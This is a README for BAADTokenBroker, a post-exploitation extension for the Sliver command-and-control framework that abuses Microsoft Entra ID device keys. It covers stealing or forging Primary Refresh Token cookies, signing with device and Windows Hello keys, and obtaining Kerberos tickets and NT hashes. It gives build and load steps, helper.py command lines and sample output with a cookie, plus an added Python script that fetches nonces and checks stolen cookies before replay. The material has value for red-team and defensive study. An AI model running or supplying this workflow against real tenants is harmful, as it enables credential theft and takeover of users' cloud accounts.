temp43487580/BAADTokenBroker
BAADTokenBroker

BAADTokenBroker is a post-exploitation tool designed to interact with Microsoft Entra ID device-bound keys.

It can:

  • Request the logged-on user’s PRT cookie
  • Create a PRT cookie using supplied credentials
  • Acquire a TGT and NT hash by abusing Entra Kerberos mechanisms

This tool was made possible thanks to the following open-source projects:

Installation

The following example demonstrates how to use BAADTokenBroker with Sliver. Adjust the steps as needed for other C2 frameworks.

  1. Compile the code
     sudo apt install gcc-mingw-w64-x86-64-win32 make
  2. Deploy the BOF
  • Copy the compiled release/BAADTokenBroker.x64.o to ~/.sliver-client/extensions/BAADTokenBroker/
  • Save the extension.json in the same directory
  • Load the BOF in Sliver:
     sliver > extensions load ~/.sliver-client/extensions/BAADTokenBroker/

Usage

BAADTokenBroker provides the following commands:

  • info: Retrieve Entra ID information
  • get_token_blob: Dump the cached token blob (mainly for research; not easy to use in engagements)
  • sign_with_dkpriv: Sign provided data using the Entra device key
  • sign_with_popkey: Sign provided data using the POP key
  • decrypt_with_popkey: Decrypt provided data using the POP key
  • sign_with_userkey: Sign provided data using the Windows Hello for Business key
  • request_prt_cookie: Request a PRT cookie
  • request_sso_tgs: Request a service ticket for Desktop SSO, which you can then use with tools such as SeamlessPass

For common scenarios you do not need to assemble these commands by hand: helper.py generates the BAADTokenBroker command lines for the outcome you want.

Run helper.py with one of the following options:

  • request_prt_cookie: Generates command lines to request the logged-on user's PRT cookie
  • create_prt_cookie: Generates command lines to create a PRT cookie using supplied credentials
  • get_tgt: Generates command lines to request a partial TGT and session key via a PRT cookie
  • get_tgt_with_whfb: Generates command lines to request a partial TGT and session key via Windows Hello for Business

Here is an example of retrieving the logged-on user's PRT cookie. To generate command lines for Sliver, the -s option is required.

$ python3 helper.py -s request_prt_cookie
[*] execute BAADTokenBroker as follows:
BAADTokenBroker -- --command request_prt_cookie --arg1 AwABEgEAAAADAOz_BQD0_0V2b1N0c0FydGlmYWN0cwUAAAAAAKXQM761QXLG8dCrW3ByGQITDdFPqQ_iURV8oT0AS3tyjjioOmsPBmN25hbVJT1ikAxhhPVFOmQUyItDYvZh99YgAA

Execute the generated command line in Sliver:

[localhost] sliver (_) > BAADTokenBroker -- --command request_prt_cookie --arg1 AwABEgEAAAADAOz_BQD0_0V2b1N0c0FydGlmYWN0cwUAAAAAAKXQM761QXLG8dCrW3ByGQITDdFPqQ_iURV8oT0AS3tyjjioOmsPBmN25hbVJT1ikAxhhPVFOmQUyItDYvZh99YgAA -arg2:<empty> (default) -arg3:<empty> (default) -arg4:<empty> (default)
[*] Successfully executed BAADTokenBroker (coff-loader)
[*] Got output:
[*] requesting PRT Cookie...
[+] request_prt_cookie success!
eyJhbGciOiJIUzI1NiIsICJrZGZfd...(omitted)
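The --arg1 value above is a short-lived nonce issued by Entra ID, and the PRT cookie the device returns is only accepted by login.microsoftonline.com together with that same nonce. The following is an added example, not code from BAADTokenBroker or helper.py, showing how an operator can fetch a fresh nonce, assemble the command line in the shape shown above, and sanity-check the returned cookie (the x-ms-RefreshTokenCredential JWT) before spending it. The nonce endpoint (grant_type=srv_challenge, JSON key "Nonce") and the cookie layout (HS256 header with ctx and kdf_ver; payload with refresh_token, is_primary and request_nonce) are taken from public PRT research and are assumptions here, not something the README states; the sample cookie and its HMAC key are constructed for the offline check and stand in for a cookie that, in reality, the device signs with a key derived from the PRT session key.

```python
import base64
import hashlib
import hmac
import json
import urllib.parse
import urllib.request

# Assumption: Entra ID hands out the nonce a PRT cookie must be bound to from
# this endpoint when asked with grant_type=srv_challenge. Network call; the
# offline checks below never invoke it.
NONCE_URL = "https://login.microsoftonline.com/common/oauth2/token"


def b64url_decode(s: str) -> bytes:
    """Decode an unpadded base64url JWT segment."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def b64url_encode(b: bytes) -> str:
    """Encode bytes as unpadded base64url, as JWT segments are."""
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


def get_nonce() -> str:
    """Fetch a fresh nonce from Entra ID (requires network access)."""
    data = urllib.parse.urlencode({"grant_type": "srv_challenge"}).encode()
    req = urllib.request.Request(NONCE_URL, data=data, method="POST")
    with urllib.request.urlopen(req, timeout=15) as resp:
        return json.load(resp)["Nonce"]


def build_bof_command(nonce: str, command: str = "request_prt_cookie") -> str:
    """Assemble the Sliver command line in the shape shown in the README."""
    if not nonce or any(c.isspace() for c in nonce):
        raise ValueError("nonce must be a single non-empty token")
    return f"BAADTokenBroker -- --command {command} --arg1 {nonce}"


def decode_prt_cookie(cookie: str):
    """Split a PRT cookie JWT into header and payload (no signature check:
    the HMAC key lives in the device's session key, which we never hold)."""
    parts = cookie.split(".")
    if len(parts) != 3:
        raise ValueError("not a JWS compact serialization")
    header = json.loads(b64url_decode(parts[0]))
    payload = json.loads(b64url_decode(parts[1]))
    return header, payload


def check_prt_cookie(cookie: str, expected_nonce: str) -> dict:
    """Checks worth running before replaying a cookie: it must be an HS256 JWT
    with a key context, carry a refresh token, be marked primary, and be bound
    to the nonce we actually requested it for."""
    header, payload = decode_prt_cookie(cookie)
    return {
        "alg_ok": header.get("alg") == "HS256",
        "has_ctx": bool(header.get("ctx")),
        "has_refresh_token": bool(payload.get("refresh_token")),
        "is_primary": payload.get("is_primary") == "true",
        "nonce_ok": payload.get("request_nonce") == expected_nonce,
    }


def make_sample_prt_cookie(nonce: str, key: bytes = b"constructed-demo-key") -> str:
    """Constructed sample cookie for offline testing only. A real cookie is
    produced by the device (here via the BOF) under a key derived from the
    PRT session key; this one just mimics the field layout."""
    header = {"alg": "HS256", "ctx": b64url_encode(b"demo-ctx"), "kdf_ver": 2}
    payload = {"refresh_token": "0.demo-refresh-token",
               "is_primary": "true", "request_nonce": nonce}
    signing_input = (b64url_encode(json.dumps(header, separators=(",", ":")).encode())
                     + "." + b64url_encode(json.dumps(payload, separators=(",", ":")).encode()))
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


if __name__ == "__main__":
    nonce = "demo-nonce"  # replace with get_nonce() on a connected host
    print(build_bof_command(nonce))
    cookie = make_sample_prt_cookie(nonce)
    print(check_prt_cookie(cookie, nonce))
```

A cookie whose request_nonce does not match the nonce you passed in --arg1 (for example because the nonce expired and a new one was fetched in between) will be rejected by Entra ID, so the nonce_ok check is the one to look at first when a replay fails.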

Legal Notice

WARNING: This tool is intended exclusively for authorized security testing and research. Use of this software for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws. The developers assume no liability and are not responsible for any misuse or damage caused by this program.
